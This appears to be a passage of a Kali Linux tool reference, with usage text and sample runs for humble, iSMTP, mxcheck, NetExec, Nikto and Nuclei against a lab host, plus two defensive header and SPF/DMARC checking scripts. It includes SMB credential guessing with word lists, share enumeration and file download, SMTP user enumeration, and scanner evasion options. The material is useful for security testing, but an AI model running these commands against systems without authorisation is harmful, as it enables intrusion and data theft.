-e [TESTSSL_PATH] Shows TLS/SSL checks; requires the PATH of https://testssl.sh/
-f [FINGERPRINT_TERM] Shows fingerprint statistics; will be the Top 20 if 'FINGERPRINT_TERM', e.g. 'Google', is omitted
-g Shows guidelines for enabling security HTTP response headers on popular servers/services
-grd Shows the checks to grade an analysis, along with advice for improvement
-l {es} Defines the language for displaying analysis, errors and messages; will be English if this parameter is omitted
-lic Shows the license for 'humble', along with permissions, limitations and conditions.
-o {csv,html,json,pdf,txt} Exports analysis to 'humble_scheme_URL_port_yyyymmdd_hhmmss_language.ext' file; csv/json will have a brief
analysis
-op OUTPUT_PATH Exports analysis to 'OUTPUT_PATH'; if this parameter is omitted the PATH of 'humble.py' will be used
-r Shows HTTP response headers and a detailed analysis; '-b' parameter will take priority
-s [SKIP_HEADERS ...] Skips 'deprecated/insecure' and 'missing' checks for the indicated 'SKIP_HEADERS' (separated by spaces)
-u URL Scheme, host and port to analyze. E.g. https://google.com
-ua USER_AGENT User-Agent ID from 'additional/user_agents.txt' file to use. '0' will show all and '1' is the default
-v, --version Checks for updates at https://github.com/rfc-st/humble
examples:
-a -l es Shows statistics (in Spanish) of the analysis performed against all URLs
-f Google Shows HTTP fingerprint headers related to the term 'Google'
-u URL -a Shows statistics of the analysis performed against the URL
-u URL -b Analyzes the URL and reports overall findings
-u URL -b -o csv Analyzes the URL and exports overall findings to CSV
-u URL -l es Analyzes the URL and reports (in Spanish) detailed findings
-u URL -o pdf Analyzes the URL and exports detailed findings to PDF
-u URL -r Analyzes the URL and reports detailed findings along with HTTP response headers
-u URL -s ETag NEL Analyzes the URL and skips 'deprecated/insecure' and 'missing' checks for 'ETag' and 'NEL' headers
-u URL -ua 4 Analyzes the URL using the fourth User-Agent of 'additional/user_agents.txt' file
■ Usage example
root@kali:~# humble -u http://192.168.11.4 -b
[1. Missing HTTP Security Headers]
Cache-Control
Clear-Site-Data
Cross-Origin-Embedder-Policy
Cross-Origin-Opener-Policy
Cross-Origin-Resource-Policy
Content-Security-Policy
NEL (Experimental HTTP header)
Permissions-Policy
Referrer-Policy
Strict-Transport-Security
X-Content-Type-Options
X-Permitted-Cross-Domain-Policies
X-Frame-Options
[2. Fingerprint HTTP Response Headers]
Server
[3. Deprecated HTTP Response Headers/Protocols and Insecure Values]
Set-Cookie (Insecure Attributes)
Vary (Potentially Unsafe Header)
[4. Empty HTTP Response Headers Values]
Nothing to report, all seems OK!
[5. Browser Compatibility for Enabled HTTP Security Headers]
Content-Type: https://caniuse.com/?search=Content-Type
Set-Cookie: https://caniuse.com/?search=Set-Cookie
Vary: https://caniuse.com/?search=Vary
Analysis done in 0.79 seconds! (changes with respect to the last analysis in parentheses)
Missing headers: 13 (First Analysis)
Fingerprint headers: 1 (First Analysis)
Deprecated/Insecure headers: 2 (First Analysis)
Empty headers: 0 (First Analysis)
Findings to review: 16 (First Analysis)
Analysis Grade: D (Review 'Deprecated/Insecure headers')
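The categories in the report above (missing security headers, fingerprint headers, insecure values, empty values) are straightforward to reproduce, which is useful when the same check has to run in a CI job or against an internal service. The script below is an added example, not humble's own code: `analyze()` takes a list of (name, value) pairs and reports the four categories for the thirteen headers humble listed as missing in that run, with extra value checks for Set-Cookie attributes, X-Content-Type-Options and the HSTS max-age; `fetch_headers()` pulls live headers with the standard library. The sample header set is constructed to mirror the findings above (the PHPSESSID value is the one from the request shown earlier on the page), and the fingerprint header list is an assumption.

```python
"""Check an HTTP response's security headers, humble-style (added example)."""
import sys
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# The headers humble reported as missing in the run above.
SECURITY_HEADERS = [
    "Cache-Control", "Clear-Site-Data", "Cross-Origin-Embedder-Policy",
    "Cross-Origin-Opener-Policy", "Cross-Origin-Resource-Policy",
    "Content-Security-Policy", "NEL", "Permissions-Policy", "Referrer-Policy",
    "Strict-Transport-Security", "X-Content-Type-Options",
    "X-Permitted-Cross-Domain-Policies", "X-Frame-Options",
]
# Headers that reveal the server stack (assumed list for the example).
FINGERPRINT_HEADERS = ["Server", "X-Powered-By", "X-AspNet-Version", "X-Generator"]

# Constructed sample modelled on the findings above; not a captured response.
SAMPLE_HEADERS = [
    ("Date", "Fri, 25 Oct 2024 07:12:46 GMT"),
    ("Server", "Apache"),
    ("Set-Cookie", "PHPSESSID=oj9u2u36v2fu15c20q52pg33a7; path=/"),
    ("Vary", "Accept-Encoding"),
    ("Content-Type", "text/html; charset=UTF-8"),
]


def analyze(headers):
    """headers: list of (name, value); repeated names (Set-Cookie) are allowed."""
    present = {}
    for name, value in headers:
        present.setdefault(name.lower(), []).append(value)
    report = {
        "missing": [h for h in SECURITY_HEADERS if h.lower() not in present],
        "fingerprint": [h for h in FINGERPRINT_HEADERS if h.lower() in present],
        "insecure": [],
        "empty": [name for name, value in headers if not value.strip()],
    }
    # Session cookies without Secure/HttpOnly/SameSite are what humble calls
    # "Set-Cookie (Insecure Attributes)".
    for cookie in present.get("set-cookie", []):
        name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().split("=", 1)[0].lower() for a in cookie.split(";")[1:]}
        lacking = [a for a in ("secure", "httponly", "samesite") if a not in attrs]
        if lacking:
            report["insecure"].append(f"Set-Cookie {name}: missing {', '.join(lacking)}")
    xcto = present.get("x-content-type-options", [""])[0]
    if "x-content-type-options" in present and xcto.strip().lower() != "nosniff":
        report["insecure"].append("X-Content-Type-Options: value is not 'nosniff'")
    hsts = present.get("strict-transport-security", [""])[0]
    if hsts:
        max_age = 0
        for directive in hsts.split(";"):
            key, _, value = directive.strip().partition("=")
            if key.lower() == "max-age" and value.isdigit():
                max_age = int(value)
        if max_age < 31536000:
            report["insecure"].append("Strict-Transport-Security: max-age below one year")
    return report


def fetch_headers(url, timeout=10):
    """GET the URL (urllib follows redirects) and return its headers as pairs."""
    req = Request(url, headers={"User-Agent": "header-check/0.1 (added example)"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.getheaders()
    except HTTPError as e:          # 4xx/5xx responses still carry headers
        return list(e.headers.items())


if __name__ == "__main__":
    headers = fetch_headers(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_HEADERS
    for section, items in analyze(headers).items():
        print(f"[{section}] {len(items)}")
        for item in items:
            print("   ", item)
```

Run without arguments it analyzes the constructed sample and reports the same shape as humble did above: thirteen missing headers, `Server` as the one fingerprint header, and the session cookie flagged for its attributes. Run with a URL it fetches the live headers; keep the check on the final response after redirects, as humble does by default, since a redirecting front end often has a different header set from the application behind it.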
ident-user-enum
Queries the ident service (113/TCP) to identify the owner of the process listening on each specified port.
■ Usage
root@kali:~# ident-user-enum --help
Usage: ident-user-enum.pl ip port [ port [ port ... ] ]
■ Usage example
root@kali:~# ident-user-enum 192.168.11.4 21 22 23 25 80 3306 5432
192.168.11.4:21 root
192.168.11.4:22 root
192.168.11.4:23 root
192.168.11.4:25 postfix
192.168.11.4:80 <unknown>
192.168.11.4:3306 mysql
192.168.11.4:5432 postgres
iSMTP
Performs SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and open relay tests.
■ Usage
root@kali:~# ismtp
Usage: ./iSMTP.py <OPTIONS>
Required:
-f <import file> Imports a list of SMTP servers for testing.
(Cannot use with '-h'.)
-h <host> The target IP and port (IP:port).
(Cannot use with '-f'.)
Spoofing:
-i <consultant email> The consultant's email address.
-s <sndr email> The sender's email address.
-r <rcpt email> The recipient's email address.
--sr <email> Specifies both the sender's and recipient's email address.
-S <sndr name> The sender's first and last name.
-R <rcpt name> The recipient's first and last name.
--SR <name> Specifies both the sender's and recipient's first and last name.
-m Enables SMTP spoof testing.
-a Includes .txt attachment with spoofed email.
SMTP enumeration:
-e <file> Enable SMTP user enumeration testing and imports email list.
-l <1|2|3> Specifies enumeration type (1 = VRFY, 2 = RCPT TO, 3 = all).
(Default is 3.)
SMTP relay:
-i <consultant email> The consultant's email address.
-x Enables SMTP external relay testing.
Misc:
-t <secs> The timeout value. (Default is 10.)
-o Creates "ismtp-results" directory and writes output to
ismtp-results/smtp_<service>_<ip>(port).txt
■ Usage example
root@kali:~# ismtp -h 192.168.11.4 -e emails.txt -l 2
Testing SMTP server [user enumeration]: 192.168.11.4:25
Emails provided for testing: 2
Performing SMTP RCPT TO test...
[+] hello@localhost --- [ valid ]
[-] halo@localhost ---- [ invalid ]
Completed SMTP user enumeration test.
jSQL Injection
Exploits SQL injection vulnerabilities in the target application to extract database contents.
■ Usage example
Extracting the list of databases and tables from a vulnerable application
mxcheck
Scans a mail server and shows its DNS records (A/MX/PTR/SPF/MTA-STS/DKIM/DMARC), open ports, whether it is an open relay, and so on.
■ Usage
root@kali:~# mxcheck --help
Usage of mxcheck:
-b, --blacklist Check if the service is on blacklists
-S, --dkim-selector string The DKIM selector. If set a DKIM check is performed on the provided service domain
-d, --dnsserver string The dns server to be requested (default "8.8.8.8")
-f, --mailfrom string Set the mailFrom address (default "info@foo.wtf")
-t, --mailto string Set the mailTo address (default "info@baz.wtf")
-n, --no-prompt Answer yes to all questions
-s, --service string The service host to check
-u, --updatecheck Check for new version of mxcheck
-v, --version Version and license
-w, --write-tsv Write tsv formated report to file
■ Usage example
root@kali:~# mxcheck -s *****.dev -n
INFO: 2024/10/25 07:12:46 == Checking: *****.dev ==
INFO: 2024/10/25 07:12:46 Found MX:
INFO: 2024/10/25 07:12:46 *****.ne.jp.
INFO: 2024/10/25 07:12:46 == Checking DMARC record ==
INFO: 2024/10/25 07:12:46 DMARC set
INFO: 2024/10/25 07:12:46 _dmarc.*****.dev. 300 IN TXT "v=DMARC1; p=none; rua=mailto:eea8b9f981e94fd6ae64d9652012ca88@dmarc-reports.cloudflare.net"
INFO: 2024/10/25 07:12:46 == Checking for A record ==
INFO: 2024/10/25 07:12:46 IP address MX: ***.***.***.***
INFO: 2024/10/25 07:12:46 AS Number: 9371
INFO: 2024/10/25 07:12:46 AS Country: JP
INFO: 2024/10/25 07:12:46 == Checking for PTR record ==
INFO: 2024/10/25 07:12:46 PTR entry: *****.ne.jp.
INFO: 2024/10/25 07:12:46 PTR matches MX record
INFO: 2024/10/25 07:12:46 == Checking for SPF record ==
INFO: 2024/10/25 07:12:46 SPF set
INFO: 2024/10/25 07:12:46 *****.dev. 300 IN TXT "v=spf1 a:*****.ne.jp mx ~all"
INFO: 2024/10/25 07:12:46 == Checking for MTA-STS ==
INFO: 2024/10/25 07:12:46 MTA-STS not set
INFO: 2024/10/25 07:12:46 == Checking for open e-mail ports ==
INFO: 2024/10/25 07:12:46 Open ports: [25 465 587]
INFO: 2024/10/25 07:12:46 == Checking for open relay on port 25 ==
INFO: 2024/10/25 07:12:57 Server Banner: 220 *****.ne.jp ESMTP Sendmail 8.16.1/8.16.1; Fri, 25 Oct 2024 16:12:47 +0900 (JST)
INFO: 2024/10/25 07:12:57 Fake sender not accepted.
INFO: 2024/10/25 07:12:57 Recipient not accepted. Skipped further open relay tests.
INFO: 2024/10/25 07:12:57 Server is not an open relay
INFO: 2024/10/25 07:12:57 == Checking for STARTTLS on port 25 ==
INFO: 2024/10/25 07:12:57 STARTTLS supported
INFO: 2024/10/25 07:12:57 STARTTLS - TLS Version: TLS 1.2
INFO: 2024/10/25 07:12:57 Certificate is valid
INFO: 2024/10/25 07:12:57 == Checking for VRFY support ==
INFO: 2024/10/25 07:12:57 VRFY command not supported.
INFO: 2024/10/25 07:12:57 == Checking for TLS support on port 465 ==
INFO: 2024/10/25 07:12:57 SMTPS supported
INFO: 2024/10/25 07:12:57 SMTPS TLS certificate valid
INFO: 2024/10/25 07:12:57 SMTPS TLS Version: TLS 1.2
INFO: 2024/10/25 07:12:57 Test finished.
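mxcheck prints the SPF and DMARC records but leaves judging them to the reader; in the run above `p=none` means DMARC is only monitoring and `~all` means SPF failures are soft. The functions below are an added example, not mxcheck's code: they parse the two record formats and return a list of weaknesses (an empty list meaning the record enforces), including the RFC 7208 limit of ten DNS-querying terms that turns an over-long SPF record into a permerror. The domain names in the sample records are placeholders.

```python
"""Grade the SPF and DMARC records mxcheck prints (added example)."""


def parse_dmarc(record):
    """'v=DMARC1; p=none; rua=mailto:x' -> {'v': 'DMARC1', 'p': 'none', 'rua': ...}"""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record):
    """Return a list of weaknesses; an empty list means the policy enforces."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["not a DMARC record"]
    findings = []
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none: failing mail is only reported, not quarantined or rejected")
    elif policy not in ("quarantine", "reject"):
        findings.append("p= tag missing or invalid")
    if tags.get("pct", "100") != "100":
        findings.append(f"pct={tags['pct']}: policy applied to only part of the mail")
    if "rua" not in tags:
        findings.append("rua= missing: no aggregate reports, failures go unnoticed")
    if policy != "none" and tags.get("sp", policy).lower() == "none":
        findings.append("sp=none: subdomains are left unenforced")
    return findings


SPF_LOOKUP_MECHANISMS = {"a", "mx", "ptr", "exists", "include"}


def spf_lookup_count(record):
    """Count DNS-querying terms; RFC 7208 caps them at 10 per evaluation."""
    count = 0
    for term in record.split()[1:]:
        mech = term.lstrip("+-~?").split(":", 1)[0].split("/", 1)[0].lower()
        if mech in SPF_LOOKUP_MECHANISMS or term.lower().startswith("redirect="):
            count += 1
    return count


def assess_spf(record):
    """Return a list of weaknesses in an SPF record; empty means hard-fail policy."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record"]
    findings = []
    last = terms[-1].lower()
    if last in ("+all", "all"):
        findings.append("+all: every sender passes SPF")
    elif last == "?all":
        findings.append("?all: neutral, receivers get no verdict")
    elif last == "~all":
        findings.append("~all: softfail only; spoofed mail may still be delivered")
    elif last != "-all" and not last.startswith("redirect="):
        findings.append("no terminating 'all' mechanism")
    lookups = spf_lookup_count(record)
    if lookups > 10:
        findings.append(f"{lookups} DNS lookups: over the limit of 10, SPF evaluates to permerror")
    return findings


if __name__ == "__main__":
    # Records shaped like those in the mxcheck run above; names are placeholders.
    print(assess_dmarc("v=DMARC1; p=none; rua=mailto:reports@example.invalid"))
    print(assess_spf("v=spf1 a:mail.example.invalid mx ~all"))
```

Moving from `p=none` to `p=quarantine` or `p=reject` is normally done only after the `rua=` aggregate reports have been reviewed for a while, so that legitimate senders that fail alignment are fixed first; the checker keeps `rua=` as a separate finding for that reason.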
NetExec
An exploitation tool that supports network services such as FTP/SSH/SMB/RDP/VNC/LDAP/NFS.
■ Usage
root@kali:~# nxc --help
usage: nxc [-h] [--version] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6]
[--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT]
{wmi,ldap,nfs,rdp,vnc,mssql,smb,ftp,ssh,winrm} ...
options:
-h, --help show this help message and exit
Generic:
Generic options for nxc across protocols
--version Display nxc version
-t THREADS, --threads THREADS
set how many concurrent threads to use
--timeout TIMEOUT max timeout in seconds of each thread
--jitter INTERVAL sets a random delay between each authentication
Output:
Options to set verbosity levels and control output
--verbose enable verbose output
--debug enable debug level information
--no-progress do not displaying progress bar during scan
--log LOG export result into a custom file
DNS:
-6 Enable force IPv6
--dns-server DNS_SERVER
Specify DNS server (default: Use hosts file & System DNS)
--dns-tcp Use TCP instead of UDP for DNS queries
--dns-timeout DNS_TIMEOUT
DNS query timeout in seconds
Available Protocols:
{wmi,ldap,nfs,rdp,vnc,mssql,smb,ftp,ssh,winrm}
wmi own stuff using WMI
ldap own stuff using LDAP
nfs own stuff using NFS
rdp own stuff using RDP
vnc own stuff using VNC
mssql own stuff using MSSQL
smb own stuff using SMB
ftp own stuff using FTP
ssh own stuff using SSH
winrm own stuff using WINRM
■ Usage example
# Identify credentials using word lists
root@kali:~# nxc smb 192.168.11.4 -u users.txt -p passwords.txt
SMB 192.168.11.4 445 AAB548E9463C [*] Unix (name:AAB548E9463C) (domain:AAB548E9463C) (signing:False) (SMBv1:True)
SMB 192.168.11.4 445 AAB548E9463C [-] AAB548E9463C\hoge:hoge STATUS_LOGON_FAILURE
[...]
SMB 192.168.11.4 445 AAB548E9463C [+] AAB548E9463C\hello:hello
# List the shares using the identified credentials
root@kali:~# nxc smb 192.168.11.4 -u hello -p hello --shares
SMB 192.168.11.4 445 AAB548E9463C [*] Unix (name:AAB548E9463C) (domain:AAB548E9463C) (signing:False) (SMBv1:True)
SMB 192.168.11.4 445 AAB548E9463C [+] AAB548E9463C\hello:hello
SMB 192.168.11.4 445 AAB548E9463C [*] Enumerated shares
SMB 192.168.11.4 445 AAB548E9463C Share Permissions Remark
SMB 192.168.11.4 445 AAB548E9463C ----- ----------- ------
SMB 192.168.11.4 445 AAB548E9463C print$ READ Printer Drivers
SMB 192.168.11.4 445 AAB548E9463C tmp READ,WRITE oh noes!
SMB 192.168.11.4 445 AAB548E9463C opt READ
SMB 192.168.11.4 445 AAB548E9463C IPC$ IPC Service (aab548e9463c server (Samba 3.0.20-Debian))
SMB 192.168.11.4 445 AAB548E9463C ADMIN$ IPC Service (aab548e9463c server (Samba 3.0.20-Debian))
SMB 192.168.11.4 445 AAB548E9463C hello READ,WRITE Home Directories
# Download the files in the share
root@kali:~# nxc smb 192.168.11.4 -u hello -p hello -M spider_plus -o DOWNLOAD_FLAG=True EXCLUDE_FILTER=print$,tmp,opt,IPC$,ADMIN$ OUTPUT_FOLDER=/tmp/smb
SMB 192.168.11.4 445 AAB548E9463C [*] Unix (name:AAB548E9463C) (domain:AAB548E9463C) (signing:False) (SMBv1:True)
SMB 192.168.11.4 445 AAB548E9463C [+] AAB548E9463C\hello:hello
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] STATS_FLAG: True
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] EXCLUDE_FILTER: ['print$', 'tmp', 'opt', 'ipc$', 'admin$']
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] OUTPUT_FOLDER: /tmp/smb
SMB 192.168.11.4 445 AAB548E9463C [*] Enumerated shares
[...]
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [*] Downloads successful: 4
SPIDER_PLUS 192.168.11.4 445 AAB548E9463C [+] All files processed successfully.
root@kali:~# ls /tmp/smb/192.168.11.4/hello/
hello.txt
Nikto
Performs a security scan against a web application.
■ Usage
root@kali:~# nikto --help
Options:
-ask+ Whether to ask about submitting updates
yes Ask about each (default)
no Don't ask, don't send
auto Don't ask, just send
-check6 Check if IPv6 is working (connects to ipv6.google.com or value set in nikto.conf)
-Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
-config+ Use this config file
-Display+ Turn on/off display outputs:
1 Show redirects
2 Show cookies received
3 Show all 200/OK responses
4 Show URLs which require authentication
D Debug output
E Display all HTTP errors
P Print progress to STDOUT
S Scrub output of IPs and hostnames
V Verbose output
-dbcheck Check database and other key files for syntax errors
-evasion+ Encoding technique:
1 Random URI encoding (non-UTF8)
2 Directory self-reference (/./)
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value 0x0b as a request spacer
-followredirects Follow 3xx redirects to new location
-Format+ Save file (-o) format:
csv Comma-separated-value
json JSON Format
htm HTML Format
nbe Nessus NBE format
sql Generic SQL (see docs for schema)
txt Plain text
xml XML Format
(if not specified the format will be taken from the file extension passed to -output)
-Help This help information
-host+ Target host/URL
-id+ Host authentication to use, format is id:pass or id:pass:realm
-ipv4 IPv4 Only
-ipv6 IPv6 Only
-key+ Client certificate key file
-list-plugins List all available plugins, perform no testing
-maxtime+ Maximum testing time per host (e.g., 1h, 60m, 3600s)
-mutate+ Guess additional file names:
-mutate-options Provide information for mutates
-nointeractive Disables interactive features
-nolookup Disables DNS lookups
-nossl Disables the use of SSL
-noslash Strip trailing slash from URL (e.g., '/admin/' to '/admin')
-no404 Disables nikto attempting to guess a 404 page
-Option Over-ride an option in nikto.conf, can be issued multiple times
-output+ Write output to this file ('.' for auto-name)
-Pause+ Pause between tests (seconds)
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-RSAcert+ Client certificate file
-root+ Prepend root value to all requests, format is /directory
-Save Save positive responses to this directory ('.' for auto-name)
-ssl Force ssl mode on port
-Tuning+ Scan tuning:
1 Interesting File / Seen in logs
2 Misconfiguration / Default File
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval - Inside Web Root
6 Denial of Service
7 Remote File Retrieval - Server Wide
8 Command Execution / Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
d WebService
e Administrative Console
x Reverse Tuning Options (i.e., include all except specified)
-timeout+ Timeout for requests (default 10 seconds)
-Userdbs Load only user databases, not the standard databases
all Disable standard dbs and load only user dbs
tests Disable only db_tests and load udb_tests
-useragent Over-rides the default useragent
-until Run until the specified time or duration
-url+ Target host/URL (alias of -host)
-usecookies Use cookies from responses in future requests
-useproxy Use the proxy defined in nikto.conf, or argument http://server:port
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
-404code Ignore these HTTP codes as negative responses (always). Format is "302,301".
-404string Ignore this string in response body content as negative response (always). Can be a regular expression.
+ requires a value
■ Example
root@kali:~# nikto -host http://192.168.11.4/
- Nikto v2.5.0
---------------------------------------------------------------------------
---------------------------------------------------------------------------
+ 0 host(s) tested
┌──(root㉿kali_1)-[~]
└─# nikto -host http://192.168.11.4/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.11.4
+ Target Hostname: 192.168.11.4
+ Target Port: 80
+ Start Time: 2024-10-30 04:02:12 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ /: Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 406870, size: 26, mtime: Tue Mar 16 05:56:22 2010. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /login/: This might be interesting.
+ /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /docs/: Directory indexing found.
+ /CHANGELOG.txt: A changelog was found.
+ /login.php: Admin login page/section found.
+ /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
+ /login.php?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
+ /CHANGELOG.txt: Version number implies that there is a SQL Injection in Drupal 7, which can be used for authentication bypass (Drupalgeddon). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704 https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
+ 8102 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2024-10-30 04:02:24 (GMT0) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nuclei
Performs a security scan against a web application.
■ Usage
root@kali:~# nuclei --help
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with dns record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
-tgl list all available tags
-sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable
-code enable loading code protocol-based templates
-dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature
FILTERING:
-a, -author string[] templates to run based on authors (comma-separated, file)
-tags string[] templates to run based on tags (comma-separated, file)
-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)
-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration
-id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)
-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)
-it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration
-et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)
-em, -exclude-matchers string[] template matchers to exclude in result
-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown
-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown
-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-tc, -template-condition string[] templates to run based on expression condition
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-j, -jsonl write output in JSONL(ines) format
-irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)
-or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)
-ot, -omit-template omit encoded template in the JSON, JSONL output
-nm, -no-meta disable printing result metadata in cli output
-ts, -timestamp enables printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
-je, -json-export string file to export results in JSON format
-jle, -jsonl-export string file to export results in JSONL(ine) format
-rd, -redact string[] redact given list of keys from query parameter, request header and body
CONFIGURATIONS:
-config string path to the nuclei configuration file
-tp, -profile string template profile config file to run
-tpl, -profile-list list community template profiles
-fr, -follow-redirects enable following redirects for http templates
-fhr, -follow-host-redirects follow redirects on the same host
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
-dr, -disable-redirects disable redirects for http templates
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
-V, -var value custom vars in key=value format
-r, -resolvers string file containing resolver list for nuclei
-sr, -system-resolvers use system DNS resolving as error fallback
-dc, -disable-clustering disable clustering of requests
-passive enable passive HTTP response processing mode
-fh2, -force-http2 force http2 connection on requests
-ev, -env-vars enable environment variables to be used in template
-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts
-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts
